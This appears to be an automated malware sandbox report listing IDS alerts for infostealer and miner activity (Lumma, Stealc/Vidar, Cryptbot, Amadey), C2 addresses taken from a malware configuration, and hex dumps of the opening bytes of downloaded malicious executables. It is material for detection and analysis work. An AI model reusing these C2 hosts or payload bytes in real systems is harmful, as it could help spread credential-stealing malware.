                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50139 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50141 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50146 -> 141.8.192.141:80
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50148 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50149 -> 141.8.192.141:80
                            Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.4:49828
                            Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.4:49835 -> 154.216.20.243:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49854 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49854 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49866 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49866 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49878 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49953 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49957 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49953 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49959 -> 116.203.12.241:443
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.241:443 -> 192.168.2.4:49967
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49961 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49961 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.241:443 -> 192.168.2.4:49959
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49989 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50039 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50039 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50049 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50049 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50065 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50086 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50086 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50117 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50123 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50123 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50131 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50136 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50155 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50153 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50155 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50168 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50168 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50139 -> 104.21.50.161:443
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443
                            Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333
                            Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 4444
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://drive-connect.cyou/api
                            Source: Malware configuration extractorIPs: 185.215.113.43
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: global trafficTCP traffic: 192.168.2.4:49827 -> 37.203.243.102:3333
                            Source: global trafficTCP traffic: 192.168.2.4:49841 -> 185.157.162.216:4444
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:01:10 GMTContent-Type: application/octet-streamContent-Length: 89640Last-Modified: Sun, 15 Dec 2024 22:28:18 GMTConnection: keep-aliveETag: "675f5802-15e28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 46 47 5f 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 2e 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 36 01 00 28 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 2c 01 00 00 20 00 00 00 2e 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 00 b7 00 00 d4 95 00 00 01 00 00 00 03 00 00 06 98 ac 00 00 68 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 dc 01 00 06 2a 06 2a 1a 28 04 00 00 06 2a 46 20 77 3e 00 00 28 d0 01 00 06 28 08 00 00 06 26 2a 2e 28 06 00 00 06 28 01 00 00 0a 2a 00 00 00 1b 30 04 00 a5 00 00 00 01 00 00 11 14 0a 20 85 3e 00 00 28 d0 01 00 06 28 02 00 00 0a 0b 20 59 3f 00 00 28 d0 01 00 06 28 02 00 00 0a 0c 73 03 00 00 0a 0d 09 07 08 6f 04 00 00 0a 13 04 73 05 00 00 0a 13 05 11 05 11 04 17 73 06 00 00 0a 13 06 2b 1b 00 73 07 00 00 0a 20 6c 3f 00 00 28 d0 01 00 06 28 08 00 00 0a 0a de 03 26 de 00 06 2c e2 11 06 06 16 06 8e 69 6f 09 00 00 0a 11 05 6f 0a 00 00 0a 0a de 18 11 06 2c 07 11 06 6f 0b 00 00 0a dc 11 05 2c 07 11 05 6f 0b 00 00 0a dc 06 13 07 de 0a 09 2c 06 09 6f 0b 00 00 0a dc 11 07 2a 00 00 00 01 34 00 00 00 00 48 00 17 5f 00 03 01 00 00 01 02 00 45 00 36 7b 00 0c 00 00 00 00 02 00 39 00 4e 87 00 0c 00 00 00 00 02 00 28 00 70 98 00 0a 00 00 00 00 32 28 05 00 00 06 02 6f 0c 00 00 0a 2a aa d0 0e 00 00 01 28 0d 00 00 0a 20 a4 3e 00 00 28 d0 01 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:01:16 GMTContent-Type: application/octet-streamContent-Length: 55808Last-Modified: Sun, 15 Dec 2024 23:16:05 GMTConnection: keep-aliveETag: "675f6335-da00"Accept-Ranges: bytesData Raw: 4d 5a 6c 00 01 00 00 00 02 00 00 00 ff ff 00 00 00 00 00 00 11 00 00 00 40 00 00 00 00 00 00 00 57 69 6e 33 32 20 50 72 6f 67 72 61 6d 21 0d 0a 24 b4 09 ba 00 01 cd 21 b4 4c cd 21 60 00 00 00 47 6f 4c 69 6e 6b 2c 20 47 6f 41 73 6d 20 77 77 77 2e 47 6f 44 65 76 54 6f 6f 6c 2e 63 6f 6d 00 50 45 00 00 4c 01 05 00 39 8f c0 52 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 01 00 00 78 00 00 00 5e 00 00 00 00 00 00 30 2a 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 5d 30 01 00 03 00 00 00 00 00 10 00 00 00 01 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 30 01 00 28 00 00 00 00 10 01 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 30 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 63 6f 64 65 00 00 00 00 40 76 00 00 00 10 00 00 00 78 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 64 61 74 61 00 00 00 00 18 7b 00 00 00 90 00 00 00 4c 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 09 00 00 00 10 01 00 00 0a 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 00 00 31 00 00 00 00 20 01 00 00 02 00 00 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 69 64 61 74 61 00 00 08 04 00 00 00 30 01 00 00 06 00 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:01:21 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:01:34 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:01:41 GMTContent-Type: application/octet-streamContent-Length: 4482048Last-Modified: Sun, 15 Dec 2024 23:13:22 GMTConnection: keep-aliveETag: "675f6292-446400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 ab 4c 5d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 5c 47 00 00 66 6d 00 00 32 00 00 00 00 c0 00 00 10 00 00 00 70 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 c0 00 00 04 00 00 ab 0b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f d0 6a 00 73 00 00 00 00 c0 6a 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e4 bf 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 e3 bf 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 6a 00 00 10 00 00 00 32 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 c0 6a 00 00 02 00 00 00 42 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 6a 00 00 02 00 00 00 44 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 39 00 00 e0 6a 00 00 02 00 00 00 46 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 76 6a 73 75 62 74 71 00 00 1c 00 00 f0 a3 00 00 f6 1b 00 00 48 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 61 68 76 61 67 78 76 00 10 00 00 00 f0 bf 00 00 04 00 00 00 3e 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 c0 00 00 22 00 00 00 42 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:01:53 GMTContent-Type: application/octet-streamContent-Length: 4482560Last-Modified: Sun, 15 Dec 2024 23:14:01 GMTConnection: keep-aliveETag: "675f62b9-446600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b1 4c 5d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 e0 4b 00 00 64 71 00 00 32 00 00 00 a0 c3 00 00 10 00 00 00 f0 4b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c3 00 00 04 00 00 f2 05 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f c0 6e 00 73 00 00 00 00 b0 6e 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 86 c3 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 